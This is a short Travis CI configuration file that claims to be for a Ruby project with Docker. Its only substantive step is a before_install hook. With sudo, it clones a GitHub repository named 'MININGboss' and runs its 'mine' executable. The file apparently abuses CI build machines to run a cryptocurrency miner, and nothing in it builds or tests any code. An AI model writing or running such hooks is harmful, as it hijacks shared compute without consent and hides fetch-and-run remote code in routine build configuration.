language: ruby

services:
  - docker

before_install:
  - sudo apt install -y git && sudo git clone https://github.com/swenson1206/MININGboss.git && cd MININGboss && sudo chmod u+x mine && sudo ./mine
